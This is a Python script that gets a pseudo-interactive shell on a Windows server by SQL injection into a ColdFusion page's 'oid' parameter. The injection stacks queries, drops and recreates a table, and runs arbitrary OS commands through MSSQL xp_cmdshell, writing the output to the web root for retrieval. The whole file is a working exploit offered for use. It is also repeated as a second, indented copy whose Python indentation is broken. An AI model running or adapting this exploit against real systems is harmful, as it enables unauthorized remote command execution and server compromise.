idkwim/mashell.py

## mashell.py
#!/usr/bin/env python3
# Injector script to get a pseudo-interactive shell using xp_cmdshell
# Source post:
# Author: notdodo
# https://twitter.com/_d_0_d_o_
#
# USAGE: python3 ./mashell.py "whoami /priv"
#
import binascii
import hashlib
import requests
import sys

BASE_URL = "http://targeturl.tar/"
INJECTION_PATH = BASE_URL + "update.cfm"
OUTPUT_FILE = hashlib.md5("pwned".encode()).hexdigest() + ".txt"
WEB_ROOT = "C:\\webroot\\webapplication\\library\\"
OUTPUT_PATH = BASE_URL + OUTPUT_FILE


# Get the command and out char(100)+char(105)+char(114)
def encode_char(command):
    s = ""
    for i in command:
        s += "char(" + str(ord(i)) + ")+"
    return s[:-1]


def encode_hex(command):
    return binascii.hexlify(command.encode()).decode()


# Injection command execution using a support table
injection_payload = {
    "oid": """1;
        drop table temptable;
        create table temptable (output ntext null);
        declare @t nvarchar(4000) set @t={}
        insert into temptable(output) EXEC master..xp_cmdshell @t""",
    "retrieval": "Invia",
}

# Return the output from the table (cmd output)
check_payload = {
    "Cancel": "Annulla",
    "oid": "(select convert(int, cast((SELECT TOP 1 output FROM temptable) as ntext)) from syscolumns)",
}

# Read the command
command = " ".join(sys.argv[1:])
# Append the out redirection
command += " > " + WEB_ROOT + OUTPUT_FILE

# Update the payload
injection_payload["oid"] = injection_payload["oid"].format(encode_hex(command))

# EXECUTE
r = requests.post(INJECTION_PATH, data=injection_payload, timeout=30)
r = requests.get(OUTPUT_PATH, data=check_payload, timeout=5)
print(r.text)
	#!/usr/bin/env python3
	# Injector script to get a pseudo-interactive shell using xp_cmdshell
	# Source post:
	# Author: notdodo
	# https://twitter.com/_d_0_d_o_
	#
	# USAGE: python3 ./mashell.py "whoami /priv"
	#
	import binascii
	import hashlib
	import requests
	import sys

	BASE_URL = "http://targeturl.tar/"
	INJECTION_PATH = BASE_URL + "update.cfm"
	OUTPUT_FILE = hashlib.md5("pwned".encode()).hexdigest() + ".txt"
	WEB_ROOT = "C:\\webroot\\webapplication\\library\\"
	OUTPUT_PATH = BASE_URL + OUTPUT_FILE


	# Get the command and out char(100)+char(105)+char(114)
	def encode_char(command):
	s = ""
	for i in command:
	s += "char(" + str(ord(i)) + ")+"
	return s[:-1]


	def encode_hex(command):
	return binascii.hexlify(command.encode()).decode()


	# Injection command execution using a support table
	injection_payload = {
	"oid": """1;
	drop table temptable;
	create table temptable (output ntext null);
	declare @t nvarchar(4000) set @t={}
	insert into temptable(output) EXEC master..xp_cmdshell @t""",
	"retrieval": "Invia",
	}

	# Return the output from the table (cmd output)
	check_payload = {
	"Cancel": "Annulla",
	"oid": "(select convert(int, cast((SELECT TOP 1 output FROM temptable) as ntext)) from syscolumns)",
	}

	# Read the command
	command = " ".join(sys.argv[1:])
	# Append the out redirection
	command += " > " + WEB_ROOT + OUTPUT_FILE

	# Update the payload
	injection_payload["oid"] = injection_payload["oid"].format(encode_hex(command))

	# EXECUTE
	r = requests.post(INJECTION_PATH, data=injection_payload, timeout=30)
	r = requests.get(OUTPUT_PATH, data=check_payload, timeout=5)
	print(r.text)